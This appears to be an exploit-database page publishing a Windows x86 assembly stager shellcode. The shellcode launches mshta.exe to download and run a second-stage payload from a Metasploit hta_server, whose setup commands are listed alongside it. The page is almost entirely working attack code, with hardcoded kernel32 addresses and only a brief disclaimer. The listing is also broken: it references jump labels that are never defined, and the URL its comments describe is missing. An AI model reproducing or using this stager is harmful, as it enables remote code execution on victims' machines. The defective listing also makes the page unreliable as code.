Exploits / Vulnerability Discovered : 2021-01-22 |
Type : shellcode |
Platform : windows_x86
This exploit / vulnerability Windows/x86 download file ( via mshta + execute + stager shellcode (143 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 11-01-2021
# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x75732082
# Function address of ExitProcess in kernel32.dll: 0x7578214f
# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
# Assembly Shellcode:
global _start
section .text
jmp application
pop edi
xor eax, eax
mov [edi+65], al ; size in bytes of message db parameter
push eax ; hStderror null in this case
push eax ; hStdOutput, null
push eax ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12 ; 18 times loop to fill both structures.
push ebx
loop looper
;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44 ; cb=0x44
lea eax, [esp+0x10] ; eax points to StartUpInfo
; eax has a pointer to StartUPinfo
; esp has a pointer to Process_Info containing null values
push esp ; pointer to Process-Info
push eax ; pointer to StartUpInfo
xor ebx, ebx
push ebx ; null
push ebx ; null
push ebx ; null
inc ebx
push ebx ; bInheritHandles=true
dec ebx
push ebx ; null
push ebx ; null
push edi ; pointer to message db string
push ebx ; null
mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
call edx
push eax ; createprocessA return in eax
mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
call edx
call firststep
message db "c:\windows\system32\mshta.exe"